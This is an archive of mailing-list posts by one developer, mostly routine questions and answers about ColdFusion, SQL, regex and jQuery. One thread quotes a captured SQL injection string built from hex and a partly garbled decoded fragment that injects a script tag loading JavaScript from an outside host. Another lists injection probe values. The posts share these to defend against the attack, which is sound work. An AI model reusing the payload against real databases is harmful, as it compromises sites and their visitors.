RE: Mobile

2013-09-27 Thread Che Vilnonis
You could also look to Responsive Web Design in lieu of creating a separate site. ~Ché -Original Message- From: Ron Gowen [mailto:rsgo...@gmail.com] Sent: Friday, September 27, 2013 2:21 PM To: cf-talk Subject: Re: Mobile i use this: (not sure im cool though)

RE: Best way to use LESS CSS with CF?

2013-09-10 Thread Che Vilnonis
Rick, this short article may be of help... http://davidwalsh.name/starting-css?utm_source=CSS-Weeklyutm_campaign=Issue -75utm_medium=email -Original Message- From: Rick Faircloth [mailto:r...@whitestonemedia.com] Sent: Tuesday, September 10, 2013 8:59 AM To: cf-talk Subject: RE: Best

Need RegEx help for unknown/odd characters.

2013-05-17 Thread Che Vilnonis
Good afternoon. Occasionally when parsing a RSS feed, I get RSS data I cannot parse. Click for screenshot below (text highlighted in green). In this example, Montreal should return Montréal but does not. What regex could I use to remove or replace such odd characters?

RE: Need RegEx help for unknown/odd characters.

2013-05-17 Thread Che Vilnonis
them into the MySQL db. Ché -Original Message- How about deAccent() ? http://cflib.org/udf/deAccent On Wed, May 15, 2013 at 9:20 AM, Che Vilnonis ch...@asitv.com wrote: Good morning. Occasionally when parsing a RSS feed, I get RSS data I cannot parse. Click for screenshot below

Need RegEx help for unknown/odd characters.

2013-05-16 Thread Che Vilnonis
Good morning. Occasionally when parsing a RSS feed, I get RSS data I cannot parse. Click for screenshot below (text highlighted in green). In this example, Montreal should return Montréal but does not. What regex could I use to remove or replace such odd characters?

RE: Parsing XML response from web services with ColdFusion DeserializeJSON

2013-05-09 Thread Che Vilnonis
Hello Sasha. Try this... cfset results = reReplace(httpReponse.FileContent, ^[^]*, , ALL) cfset results = xmlParse(results) cfdump var=#results# Hope this helps... Che ~| Order the Adobe Coldfusion Anthology now!

New CF hack...

2013-04-17 Thread Che Vilnonis
http://arstechnica.com/security/2013/04/coldfusion-hack-used-to-steal-hostin g-providers-customer-data/ Thought I'd pass this on... Che ~| Order the Adobe Coldfusion Anthology now!

RE: Problem with Hackers on Donation form through Authorize.net

2013-02-18 Thread Che Vilnonis
Al, I see values like this all of the time. In most cases, I'll see values like -1, -1' or 1' for input fields. I use a custom function to scan all form vars and if there is a match... I typically ban the IP address for a period of time. You'll *likely* find a pattern to the IP addresses that

RE: JSON to CF variable?

2013-02-14 Thread Che Vilnonis
How about... cfoutput#theData.results[1].formatted_address#/cfoutput -Original Message- From: Les Irvin [mailto:les.cft...@gmail.com] Sent: Thursday, February 14, 2013 4:12 PM To: cf-talk Subject: JSON to CF variable? Taking this JSON result from Google:

(ot) Fed Reserve Hack

2013-02-07 Thread Che Vilnonis
With all of the talk of CF security I thought I'd pass this along. According to Chris Wysopal of VeraCode, the site was running Coldfusion. https://www.veracode.com/blog/2013/02/stolen-data-headers-from-the-federal-r eserve-hack/

(ot) Ionics Isapi Rewrite Filter Question

2013-01-03 Thread Che Vilnonis
Hello all and apologies for being off topic. I have client that is looking to fix all 404s errors based on their Google Analytics report. For some reason, they have several hundred malformed URLs that were indexed by the googlebot like so:

RE: Making a website mobile friendly

2012-07-24 Thread Che Vilnonis
Greg, Google responsive web design. You'll see that there are many ways to accomplish this. For older sites, it may be best to have a completely new version of the site. For sites that are new or for sites that are being redesigned there are ways to create a site using CSS3 or dynamic CSS (via

CF, Bots sessionTimeouts

2012-05-16 Thread Che Vilnonis
I maintain a well-trafficked site on CF9 that has occasional memory problems that ultimately requires restarts. I am fairly certain the cause of my problems is related to bot hits and the server's memory they take up. I am attempting to set low sessionTimeouts to all bots to remedy this

MySQL question

2012-05-07 Thread Che Vilnonis
Should be a simple one for a mysql guru. What is the mysql equivalent of the following? select datePart(dd,timestamp) as dayOfMonth, count(timestamp) as searchesPerDay from mytable where (timestamp between '5/1/2012 00:00:00' and '5/31/2012 23:59:59') group by datePart(dd,timestamp) order by

Regex for High Ascii Chars

2012-04-17 Thread Che Vilnonis
Hello all. I'm dealing with a API where some of the results are populated with certain Ascii characters in order to get higher sorting results. For example, some of the characters I'm finding are: 8635 or 9606 or 9658 or 9668 or 9734 or 9835 Is there a regex that could remove all of these

RE: Failed PCI Compliance test on CF9.01

2012-03-06 Thread Che Vilnonis
Robert, a product like Fuseguard from Pete Freitag or a Web Application Firewall (or a plugin type of filter to your existing firewall) may help. I'm currently going through a similar process and thought these options might help. Ché -Original Message- From: Robert Rhodes

RE: Is what I'm trying to do with XML even possible?

2012-01-04 Thread Che Vilnonis
Rick, does something like this work for you? cfset theURL = http://www.lennox.com/api/v1/z7RRSHM/Categories; cfhttp url=#theURL# method=GET result=xmlFeed cfset xmlFeed = xmlParse(theURL) cfset theArray = xmlSearch(xmlFeed, //*[local-name() = 'Category']) / cfloop index=i from=1

Determining if multiple Sites are Up/Down?

2011-10-13 Thread Che Vilnonis
I have a niche directory website that lists dozens of other related sites. What would be the best way to determine if a web site is up/down so I can programmatically make a site active or inactive? I was thinking of just creating a scheduled task and using cfhttp and looking for a status code of

RE: Determining if multiple Sites are Up/Down?

2011-10-13 Thread Che Vilnonis
/Down? Have you look at the System Probes feature in the CF Admin? On Thu, Oct 13, 2011 at 8:38 AM, Che Vilnonis ch...@asitv.com wrote: I have a niche directory website that lists dozens of other related sites. What would be the best way to determine if a web site is up/down so I can

CSS Conditionals Question

2011-08-11 Thread Che Vilnonis
I know how to call/import different CSS files using statements like this: !--[if lte IE 7] My question is: within a single CSS file, is it possible to have conditonal CSS statements? I'm looking for a solution that doesn't require CF, PHP, or ASP. Thanks, Che

RE: CSS Conditionals Question

2011-08-11 Thread Che Vilnonis
Dan/Les thanks. I was aware of the other methods and was hoping I could have conditional logic in one CSS file. IE really is a PITA! -Original Message- From: Les Mizzell [mailto:lesm...@bellsouth.net] Sent: Thursday, August 11, 2011 10:59 AM To: cf-talk Subject: Re: CSS Conditionals

RE: QoQ in Railo

2011-06-23 Thread Che Vilnonis
Have you tried the Railo Group? It's worked for me in the past. http://groups.google.com/group/railo?lnk=srg ~Che -Original Message- From: Brian Cain [mailto:bcc9...@gmail.com] Sent: Thursday, June 23, 2011 1:13 PM To: cf-talk Subject: QoQ in Railo Hello all, I am attempting to

Can anyone decode this?

2011-05-13 Thread Che Vilnonis
Can anyone decode this? This was a URL attack that was caught by some custom code. I tried decoding the string at http://meyerweb.com/eric/tools/dencoder/ but had no luck. 113|736;DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861

RE: Can anyone decode this?

2011-05-13 Thread Che Vilnonis
://sdo.1000mg.cn/csrss/w.js;/sc???C?rr?v?WR?r??2?r???BR?rrR? /titlescript src=http://sdo.1000m?r?6??77'72?r??2#???67??C?rrr?dUD?H NEXT FROM Table_Cursor INTO @T,@C E??B?4??4R?F??U?7W'6??DT4?DR?F???_Cursor On Fri, May 13, 2011 at 9:31 AM, Che Vilnonis ch...@asitv.com wrote: Can

RE: CFFILEUPLOAD total confusion

2011-05-03 Thread Che Vilnonis
If you want to go the jQuery route, you could try Uploadify. I recently used it and had no issues. http://www.uploadify.com/ Regards, Che -Original Message- From: Gene Godsey [mailto:gene.god...@comcast.net] Sent: Tuesday, May 03, 2011 3:21 PM To: cf-talk Subject: CFFILEUPLOAD total

RE: Insert without checking existance

2011-01-28 Thread Che Vilnonis
Could this be combined with an ELSE statement in SQL? That is, insert if new, update if existing? Thanks, Che -Original Message- This is what I'm using at the moment but I'm going to read what you have as well. I want fast and safe. cfquery datasource=#variables.dsn#

RE: Insert without checking existance

2011-01-28 Thread Che Vilnonis
Michael, I found this using Google... UPDATE Table1 SET (...) WHERE Column1='SomeValue' IF @@ROWCOUNT=0 INSERT INTO Table1 VALUES (...) Might be better? Che -Original Message- From: Michael Dinowitz [mailto:mdino...@houseoffusion.com] Sent: Friday, January

RE: Return boolean from a CFC query -- UPDATE: Solved

2011-01-26 Thread Che Vilnonis
Charlie, is this true only when the return type is Boolean? Otherwise, it should return the actual recordcount, right? Thanks, Che You could also drop the comparison itself since CF does implicit boolean conversion. cfreturn isStudentEmployee.recordcount / ^That'll do the same thing.

RE: CF Permanent Redirect (301)???

2011-01-18 Thread Che Vilnonis
I believe Google's webmaster tools has the option to treat www and non-www traffic as the same? ~Che -Original Message- From: Aaron Renfroe [mailto:mossma...@gmail.com] Sent: Tuesday, January 18, 2011 4:07 PM To: cf-talk Subject: CF Permanent Redirect (301)??? Hello Everyone! I've

(ot) Server Setup Opinions

2011-01-14 Thread Che Vilnonis
explain. I guess I'm wondering if it is still frowned upon to combine the database and the web server on the same machine? Any responses would be appreciated. Che Vilnonis Application Developer Advertising Systems Incorporated 8470C Remington Avenue Pennsauken, NJ 08110 p: 856.488.2211 f

RE: (ot) Server Setup Opinions

2011-01-14 Thread Che Vilnonis
No problem. Were a Windows shop. So it will be Microsoft 2008 R2 for the OS and the DB. -Original Message- From: Kelly Matthews [mailto:ke...@webdiva.org] Sent: Friday, January 14, 2011 8:59 AM To: cf-talk Subject: Re: (ot) Server Setup Opinions Oops sorry for the dupe. Windows or

RE: (ot) Server Setup Opinions

2011-01-14 Thread Che Vilnonis
Thanks for all of the responses. Looks like I'll be doing what I always have done... keeping the db and the app server separate. -Original Message- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Friday, January 14, 2011 12:40 PM To: cf-talk Subject: RE: (ot) Server Setup

CF and a Remote PHP Site...

2010-12-08 Thread Che Vilnonis
We have a client that sells custom built picture frames on an older CF app. His competition uses software that allows customers to upload photos and to visually see the picture frames they are building. He wants to add this functionality to his web site. I was put in touch with a company that

RE: CF and a Remote PHP Site...

2010-12-08 Thread Che Vilnonis
the photo to fit in the frame, and overlay it on top of the frame image using a div and position it. Russ -Original Message- From: Che Vilnonis [mailto:ch...@asitv.com] Sent: 08 December 2010 17:19 To: cf-talk Subject: CF and a Remote PHP Site... We have a client that sells custom built

RE: CF and a Remote PHP Site...

2010-12-08 Thread Che Vilnonis
/some.cfm?width=487height=48picture=9734857 etc. HTH Dominic On 8 December 2010 18:27, Che Vilnonis ch...@asitv.com wrote: Thanks Russ. Let me explain further. The third party PHP site would mimic the entire line of products that the picture framing company sells. (IDs and SKUs would

RE: cfhttp connection timeout - best way to loop or re-try?

2010-11-18 Thread Che Vilnonis
Maybe you could do something like this: cfhttp url=somURL method=GET result=results cfif findNoCase(200, results.StatusCode) continue to process cfelse re-process /cfif If you get a timeout, I believe the status code will not be 200 and therefore you could try again. HTH...

RE: Countries Select Box

2010-11-11 Thread Che Vilnonis
Rick, do you mean something like this? Most are there except Axis-of-Evil countries. Afghanistan AF Albania AL Algeria DZ American Samoa (U.S. Ter.) AS Andorra AD Angola AO Anguilla AI Antigua Barbuda AG Antilles (Netherland) AN Argentina AR Armenia AM Aruba AW Ascension GB2 Australia AU

RE: Looping over Query that's contained in a structure.

2010-10-14 Thread Che Vilnonis
over Query that's contained in a structure. I don't know what's funnier. Dispise being intentional or not. On Wed, Oct 13, 2010 at 4:16 PM, Che Vilnonis ch...@asitv.com wrote: I dispise typos. Sorry to bother everyone

RE: Looping over Query that's contained in a structure.

2010-10-14 Thread Che Vilnonis
of how many people? 3? ;) Thanks, Eric Cobb ECAR Technologies, LLC http://www.ecartech.com http://www.cfgears.com Che Vilnonis wrote: Michael, would you believe once upon a time I placed 'top 3' in my local spelling bee? Age has not been kind to my spelling and/or typing skills

Looping over Query that's contained in a structure.

2010-10-13 Thread Che Vilnonis
I have a structure, Q. In it, I have several vars and a query, LINEITEMS. I'm having a brainfart, how can I loop over the query LINEITEMS that's in my structure? See link for screen dump of the structure: http://www.asitv.com/images/dump_ss.jpg Thanks, Che

RE: Looping over Query that's contained in a structure.

2010-10-13 Thread Che Vilnonis
I tried that. I get, The value of the attribute query, which is currently q.lineitems, is invalid. I also tried cfloop query=q[lineItems] and cfloop query=q[lineItems][resultset]... No luck with either. -Original Message- From: Leigh [mailto:cfsearch...@yahoo.com] Sent: Wednesday,

RE: Looping over Query that's contained in a structure.

2010-10-13 Thread Che Vilnonis
I dispise typos. Sorry to bother everyone. -Original Message- From: David McGraw [mailto:david.mcg...@gmail.com] Sent: Wednesday, October 13, 2010 4:13 PM To: cf-talk Subject: Re: Looping over Query that's contained in a structure. Could be becuase your structure key is LineTEMS, not

Need A jQuery Guru's Help

2010-09-14 Thread Che Vilnonis
I have a form that has some form elements that are disabled by default. There is a radio button (sameasbilling -- default value is 'true') that when checked will enable the disabled elements. Here is my problem, when the form is submitted it is validated. If an error occurs, the app redirects

RE: Need A jQuery Guru's Help

2010-09-14 Thread Che Vilnonis
Thanks Tony! I tweaked your snippet and everything now works. -Original Message- From: Tony Bentley [mailto:cascadefreehee...@gmail.com] Sent: Tuesday, September 14, 2010 12:36 PM To: cf-talk Subject: Re: Need A jQuery Guru's Help script cfif formIsValid

RE: RegEx: Grabbing Keywords from Referers

2010-08-24 Thread Che Vilnonis
Thanks for the update Peter. -Original Message- From: Peter Boughton [mailto:bought...@gmail.com] Sent: Tuesday, August 24, 2010 4:58 AM To: cf-talk Subject: Re: RegEx: Grabbing Keywords from Referers cfset keywords = reMatchNoCase([?|][p|q]=[^]+, referer) This is incorrect - the |

Grabbing Keywords from Referers

2010-08-23 Thread Che Vilnonis
I'm looking for a script to parse (yahoo,bing,google) keywords from the cgi.http_referer variable preferrably done using CF's or a Java RegEx. Is there such a beast? TIA, Che ~| Order the Adobe Coldfusion Anthology now!

RE: RegEx: Grabbing Keywords from Referers

2010-08-23 Thread Che Vilnonis
/cfloop On Mon, Aug 23, 2010 at 11:52 AM, Che Vilnonis ch...@asitv.com wrote: I'm looking for a script to parse (yahoo,bing,google) keywords from the cgi.http_referer variable preferrably done using CF's or a Java RegEx. Is there such a beast? TIA, Che

RE: RegEx: Grabbing Keywords from Referers

2010-08-23 Thread Che Vilnonis
-J3tDwAAAKoEBU_QXcSj It matches q=coldfusion q=f Not sure where the second q= came from. I just did a search on the Google homepage for ColdFusion. andy -Original Message- From: Che Vilnonis [mailto:ch...@asitv.com] Sent: Monday, August 23, 2010 12:54 PM To: cf-talk Subject: RE: RegEx

RE: RegEx: Grabbing Keywords from Referers

2010-08-23 Thread Che Vilnonis
Andy thanks again so much... this seems to work with Yahoo,Bing Google. My RegEx skills are a work in progress. cfset referer = http://search.yahoo.com/search;_ylt=Aqj24Omsi1LGKlDY4_G1hi6bvZx4?fr=yfp-t-7 01-stoggle=1cop=mssei=UTF8p=children%20karate%20uniform cfset keywords =

RE: Move CF website to non CF host

2010-08-13 Thread Che Vilnonis
Nice affiliate link! Hope you make a few shekels from developers clicking. https://alurium.com/clients/affiliates.php -Original Message- From: Scott Stewart [mailto:webmas...@sstwebworks.com] Sent: Friday, August 13, 2010 4:40 PM To: cf-talk Subject: Re: Move CF website to non CF host

Extracting part of a string (part 2)

2010-07-20 Thread Che Vilnonis
I also have a regex I can't seem to get right and could you some help. Take the following string... buick 322 engine (76023) $400 (dallas) How would I extract just the price ($400) without the dollar sign? TIA, Che ~| Order

RE: Extracting part of a string (part 2)

2010-07-20 Thread Che Vilnonis
. \$(\w+) should also return the same result. On Tue, Jul 20, 2010 at 8:24 AM, Che Vilnonis ch...@asitv.com wrote: I also have a regex I can't seem to get right and could you some help. Take the following string... buick 322 engine (76023) $400 (dallas) How would I extract just the price

Need Advice on Processing After a Page Has Been Rendered

2010-07-19 Thread Che Vilnonis
I have a script that pulls data from several external sources and returns the top 500 results and takes about 3-5 seconds to render. To speed things up, I want to database the results for later use. How can I database the results while the user is viewing the page without the increasing the pages

RE: In a pickle, need some help...

2010-06-26 Thread Che Vilnonis
Alan, you got an IP address I can add? Email me at chevy AT asitv DOT com. Thanks! -Original Message- From: Alan Rother [mailto:alan.rot...@gmail.com] Sent: Friday, June 25, 2010 3:20 PM To: cf-talk Subject: Re: In a pickle, need some help... Can you share a link so we can look at it

In a pickle, need some help...

2010-06-25 Thread Che Vilnonis
I am in the process of moving two sites that I have hosted for over 10 years, from my server to my clients server. At the moment, only I can see how the sites that are hosted on my client's server render in my browser. So, here's what is weird. CSS and images (.jpg/.gif) render fine in Firefox

RE: In a pickle, need some help...

2010-06-25 Thread Che Vilnonis
One more thing... This is an old fusebox-sh site that uses the formurl2attributes.cfm custom tag. That might help... -Original Message- From: Che Vilnonis [mailto:ch...@asitv.com] Sent: Friday, June 25, 2010 1:57 PM To: cf-talk Subject: In a pickle, need some help... I am

RE: SQL Gurus... can this query be written more efficiently?

2010-06-18 Thread Che Vilnonis
Thanks all. In the end, Carl's idea to use NOT IN and Micheal's reminder to use SQL indexes allowed me to drop a good 1 to 1.5 seconds. Cool beans! -Original Message- From: Dave Watts [mailto:dwa...@figleaf.com] Sent: Friday, June 18, 2010 12:26 PM To: cf-talk Subject: Re: SQL Gurus...

SQL Gurus... can this query be written more efficiently?

2010-06-17 Thread Che Vilnonis
Take the following query. Is there a more efficient way to handle the where clause? Specifically, the last two 'and' statements that loop through two different lists, one that includes results and one that excludes results. Thanks, Che select searchterm, searchtype, numresults, timestamp from

CF Domain Redirects

2010-06-03 Thread Che Vilnonis
Here is the scenario. I own a domain. Call it domain.com. I also own an often misspelled version, domains.com. Note the extra 's'. I'd like to have domain.com automatically redirect to www.domain.com. I'd also like have the www.domains.com or domains.com automatically redirect to www.domain.com.

RE: CF Domain Redirects

2010-06-03 Thread Che Vilnonis
Scott, good point on onRequestStart. Ian, here is what prompted my post. When a user types domains.com, all of the links on the site say domains.com as they click through the site. I want them to say www.domain.com w/o having to go back and re-code all of the sites hyperlinks. My DNS is

RE: CF Domain Redirects

2010-06-03 Thread Che Vilnonis
. This was simplified of course. The redirect is in the domain of the web server not the application server. Let the appropriate software handle the appropriate jobs. Steve -Original Message- From: Che Vilnonis [mailto:ch...@asitv.com] Sent: Thursday, June 03, 2010 11:33 AM To: cf-talk Subject: RE: CF

RE: CF Domain Redirects

2010-06-03 Thread Che Vilnonis
Dennis, I decided to use an IIS redirect. I'm curious to know what penalty a redirect would be in say Google's eyes. After all, domain.com to www.domain.com is a redirect... and it would be absurd to penalize a site for a simple redirect like that. Che -Original Message- From: UXB

RE: Query Results sent from search engines CGI variable?

2010-06-01 Thread Che Vilnonis
Try parsing the cgi.http_referer variable. It won't always have a value, but when it does, you can extract the keywords used when querying the search engine. Regards, Che -Original Message- From: UXB Internet [mailto:denn...@uxbinternet.com] Sent: Tuesday, June 01, 2010 4:35 PM To:

RE: SQL Gurus... obtaining the correct Incremental ID

2010-04-29 Thread Che Vilnonis
... obtaining the correct Incremental ID You can of course avoid the whole issue by using the result_name.IDENTITYCOL value returned from the cfquery tag (if you are on CF8 or higher). mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/ On 29 April 2010 01:51, Che Vilnonis

SQL Gurus... obtaining the correct Incremental ID

2010-04-28 Thread Che Vilnonis
When using set nocount on, select @@identity as xyz and set nocount off in a cfquery, how can I be certain that two transactions that occur at roughly the same time obtain the proper incremental id from an Identity column? Is their a SQl equivalent to CF's cflock tag? Thanks, Che

RE: SQL Gurus... obtaining the correct Incremental ID

2010-04-28 Thread Che Vilnonis
the correct Incremental ID On Wed, Apr 28, 2010 at 1:51 PM, Che Vilnonis ch...@asitv.com wrote: When using set nocount on, select @@identity as xyz and set nocount off in a cfquery, how can I be certain that two transactions that occur at roughly the same time obtain the proper incremental id

RE: SQL Gurus... obtaining the correct Incremental ID

2010-04-28 Thread Che Vilnonis
I am using the cftransaction tags. Honestly, I was not absolutely sure that I needed to do anything else and that is why I posted my original question. -Original Message- From: nvc 1 [mailto:n...@hotmail.co.uk] Sent: Wednesday, April 28, 2010 4:14 PM To: cf-talk Subject: Re: SQL

Not so simple date format question...

2010-04-27 Thread Che Vilnonis
I'm working with an accounting database that stores order dates as a varchar (8) field. An example would be 20100420. Obviously, CF's dateformat chokes when used. Short of using a bunch of cfset statements with CF functions, how can I (in SQL preferrably or CF) easily format this string to

RE: Not so simple date format question...

2010-04-27 Thread Che Vilnonis
MSSQL 2005 I figured a db convert statement might be needed? -Original Message- From: Leigh [mailto:cfsearch...@yahoo.com] Sent: Tuesday, April 27, 2010 11:37 AM To: cf-talk Subject: Re: Not so simple date format question... Which database are you using?

RE: Not so simple date format question...

2010-04-27 Thread Che Vilnonis
Barney, thanks! I had something similar. Leigh, that is what I was looking for. Works perfectly. Thanks to you as well. Che -Original Message- From: Leigh [mailto:cfsearch...@yahoo.com] Sent: Tuesday, April 27, 2010 11:44 AM To: cf-talk Subject: RE: Not so simple date format

RE: how to incremently fetch data

2010-03-25 Thread Che Vilnonis
Bobby, this code is for SQL 2005 and newer right? I'm on SQL 2000 (yeah, I know...lame) and I've never been able to find a solution that works. ~Che -Original Message- From: Bobby Hartsfield [mailto:bo...@acoderslife.com] Sent: Thursday, March 25, 2010 8:59 AM To: cf-talk Subject: RE:

CFThread limitations with CF9 Standard vs Enterprise

2010-03-25 Thread Che Vilnonis
Back when CF8 was released, there were discussions about cfthread and limitations when using CF8 standard edition vs. the enterprise edition. Does anyone know if anything has changed with cfthread in CF9 between the two versions? Thanks, Che

RE: CFThread limitations with CF9 Standard vs Enterprise

2010-03-25 Thread Che Vilnonis
://www.adobe.com/products/coldfusion/pdfs/cf9_feature_comparison_matrix_ ue.pdf mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/ On 25 March 2010 23:07, Che Vilnonis ch...@asitv.com wrote: Back when CF8 was released, there were discussions about cfthread

RE: CF-Based Content Management Systems

2010-03-18 Thread Che Vilnonis
Hands down... http://www.getmura.com/ -Original Message- From: Peter Donahue [mailto:pdonah...@sbcglobal.net] Sent: Thursday, March 18, 2010 4:30 PM To: cf-talk Subject: CF-Based Content Management Systems Good afternoon everyone, I just got off of the phone with a client that

RE: CF-Based Content Management Systems

2010-03-18 Thread Che Vilnonis
You can't go wrong with Farcry as well. -Original Message- From: Jake Churchill [mailto:reyna...@gmail.com] Sent: Thursday, March 18, 2010 4:42 PM To: cf-talk Subject: Re: CF-Based Content Management Systems Definitely go with Farcry. http://www.farcrycms.org. There is a blogging

RE: Easy Regex question?

2010-03-15 Thread Che Vilnonis
question? do you mind sharing the solution please? On Fri, Mar 12, 2010 at 1:28 PM, Che Vilnonis ch...@asitv.com wrote: Scratch that... I figured it out! -Original Message- From: Che Vilnonis [mailto:ch...@asitv.com] Sent: Friday, March 12, 2010 4:25 PM To: 'cf-talk

Validating mailing addresses or determining Zip+4 zipcodes...

2010-03-12 Thread Che Vilnonis
I have a client that is getting hammered by UPS with charges for address corrections when customers enter a shipping address that is (even slightly) incorrect. Does anyone know of a database or a web service (paid or free) that can: #1. Verify a complete mailing address? #2. or provide a Zip+4

RE: Validating mailing addresses or determining Zip+4 zipcodes...

2010-03-12 Thread Che Vilnonis
John/Dorioo thanks for the links! Free APIs are my friend. :) -Original Message- From: Dorioo [mailto:dor...@gmail.com] Sent: Friday, March 12, 2010 11:32 AM To: cf-talk Subject: Re: Validating mailing addresses or determining Zip+4 zipcodes... If they're using UPS already, UPS has

Easy Regex question?

2010-03-12 Thread Che Vilnonis
This should be easy. How do I remove all text between table/table tags from a larger string? Thanks, Che ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists

RE: Easy Regex question?

2010-03-12 Thread Che Vilnonis
Scratch that... I figured it out! -Original Message- From: Che Vilnonis [mailto:ch...@asitv.com] Sent: Friday, March 12, 2010 4:25 PM To: 'cf-talk@houseoffusion.com' Subject: Easy Regex question? This should be easy. How do I remove all text between table/table tags from a larger

RE: CDATA / CGLOBAL Purging

2010-02-24 Thread Che Vilnonis
YUP, write a query against both of these tables to delete all entries that are older than a certain data range. I've done something like this in the past... btw, this is old code :) !--- // Get the Date X days ago and format it. // --- cfset XDaysAgo = DateFormat(DateAdd(d, -180, Now()),

RE: FedEx web service

2010-01-19 Thread Che Vilnonis
Robert, please explain what you mean... how might one do this? thanks -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Tuesday, January 19, 2010 4:01 PM To: cf-talk Subject: RE: FedEx web service yet forgot to pay me Don't you put a time-out in? I

RE: Downloading a file from a website

2010-01-18 Thread Che Vilnonis
cfcontent should work if I remember correctly. ~CV -Original Message- From: Phillip Vector [mailto:vec...@mostdeadlygame.com] Sent: Monday, January 18, 2010 3:15 PM To: cf-talk Subject: Downloading a file from a website If I wanted to have my server download an image from a website,

RE: Downloading a file from a website

2010-01-18 Thread Che Vilnonis
OOPS, I misread the email... Yup, you can scrape images from other sites with cfhttp. ~CV -Original Message- From: Cameron Childress [mailto:camer...@gmail.com] Sent: Monday, January 18, 2010 3:17 PM To: cf-talk Subject: Re: Downloading a file from a website On Mon, Jan 18, 2010 at

(ot) SQL Guru Needed

2010-01-13 Thread Che Vilnonis
Hello. Any SQL Guru up for a challenge? I've inherited a wacky database that I need to pull info from. I'm trying to pull a range of prices for a specific product. I'd like to simply the two queries below (which work), possibly using sub-queries or some other SQL trick. Any ideas? cfset pid =

RE: (ot) SQL Guru Needed

2010-01-13 Thread Che Vilnonis
Bangs head on desk... Needs more coffee... Don't know why I tried to overcomplicate things, but that seems to work. Thanks! CV -Original Message- From: Leigh [mailto:cfsearch...@yahoo.com] Sent: Wednesday, January 13, 2010 11:08 AM To: cf-talk Subject: Re: (ot) SQL Guru Needed What

Round to the nearest .5 value

2009-11-25 Thread Che Vilnonis
I'm trying to create a ratings system that shows 1/2 values. Quick question, what would be the easiest way to round a value to the nearest .5 of a number? I'm trying to avoid multiple if/elses. i.e. 3.21 would round to 3 i.e. 3.31 would round to 3.5 i.e. 3.61 would round to 3.5 i.e. 3.91 would

RE: Round to the nearest .5 value

2009-11-25 Thread Che Vilnonis
Sweet! Many years ago, in high school Algebra class, I would have been able to figure that out. It's amazing what we forget. -Original Message- From: Barney Boisvert [mailto:bboisv...@gmail.com] Sent: Wednesday, November 25, 2009 2:23 PM To: cf-talk Subject: Re: Round to the nearest .5

RE: Looking for jQuery Form Help...

2009-10-14 Thread Che Vilnonis
Thanks again Tony. Your help is much appreciated... -Original Message- From: Tony Bentley [mailto:t...@tonybentley.com] Sent: Tuesday, October 13, 2009 5:33 PM To: cf-talk Subject: Re: Looking for jQuery Form Help... You just need to point to each form element that you want to

RE: Splitting a list...

2009-10-14 Thread Che Vilnonis
Would this work? http://cflib.org/udf/ListSplit -Original Message- From: Peter Boughton [mailto:bought...@gmail.com] Sent: Wednesday, October 14, 2009 5:33 AM To: cf-talk Subject: Re: Splitting a list... lets say we have 650 elements in our list. split them into seperate lists with a

Looking for jQuery Form Help...

2009-10-13 Thread Che Vilnonis
Take a look at the link below. It's a screen shot of a form where the Shipping form fields can be toggled on/off. I haven't been able to find (or search properly) for jQuery code that does something similar. Can anyone point me in the right direction? Thanks, Che

RE: Looking for jQuery Form Help...

2009-10-13 Thread Che Vilnonis
I should add that by default, the bottom form fields in my example screen shot are off. That is, they are visible, but you can't enter any data. When turned on, only then can data be entered. Thanks in advance to anyone that can help. -Original Message- From: Che Vilnonis [mailto:ch

RE: Looking for jQuery Form Help...

2009-10-13 Thread Che Vilnonis
Tony, thanks so much! Tested EQ What I needed! -Original Message- From: Tony Bentley [mailto:t...@tonybentley.com] Sent: Tuesday, October 13, 2009 11:32 AM To: cf-talk Subject: Re: Looking for jQuery Form Help... Tested: input type=radio onclick=showHide(true) value=true

RE: Looking for jQuery Form Help...

2009-10-13 Thread Che Vilnonis
Hello again Tony. How would I take your below example and use it to disable select boxes, textareas, radio buttons and checkboxes? Thanks, Che -Original Message- From: Tony Bentley [mailto:t...@tonybentley.com] Sent: Tuesday, October 13, 2009 11:32 AM To: cf-talk Subject: Re: Looking

RE: http://cflib.org/ down???

2009-10-06 Thread Che Vilnonis
Sounds like a potential blog entry??? -Original Message- From: Raymond Camden [mailto:rcam...@gmail.com] Subject: Re: http://cflib.org/ down??? Got it guys. Thanks. This is a dumb bug that only occurs after a reboot, and I've yet to fix it. FYI, also note another mistake I'll point

http://cflib.org/ down???

2009-10-05 Thread Che Vilnonis
Who needs to be notified? Ray, C? Che Vilnonis Application Developer Advertising Systems Incorporated 8470C Remington Avenue Pennsauken, NJ 08110 p: 856.488.2211 f: 856.488.1990 www.asitv.com ~| Want to reach the ColdFusion

Splitting a list...

2009-10-05 Thread Che Vilnonis
Say you have a list with 12 elements... something like... cfset thelist = aa,bb,cc,dd,ee,ff,uu,vv,ww,xx,yy,zz What would be the most efficient way to split the list into two lists, one containing the first 6 elements, the other the last six elements. Currently, I'm using cfloop to build a 2 new

RE: Splitting a list...

2009-10-05 Thread Che Vilnonis
Thanks. I'm not sure if your method is quicker, but it allows me to break my list wherever I need to. -Original Message- From: Claude Schneegans [mailto:schneeg...@internetique.com] Sent: Monday, October 05, 2009 12:00 PM To: cf-talk Subject: Re: Splitting a list... cfset thelist

Simple JS question...

2009-09-16 Thread Che Vilnonis
Hope this one is easy... how can I get the selected value from a form's select box and then pass that value as a variable in a href? Can it be done with an onClick event? a onclick=*some js here*; href=/account/index.cfm?mode=wishlistproductid=*js value here*Add to Wishlist/abr / Thanks, Che

RE: Simple JS question...

2009-09-16 Thread Che Vilnonis
; } /script On Wed, Sep 16, 2009 at 11:54 AM, Che Vilnonis ch...@asitv.com wrote: Hope this one is easy... how can I get the selected value from a form's select box and then pass that value as a variable in a href? Can it be done with an onClick event? a onclick=*some js here*; href

  1   2   3   4   5   6   7   >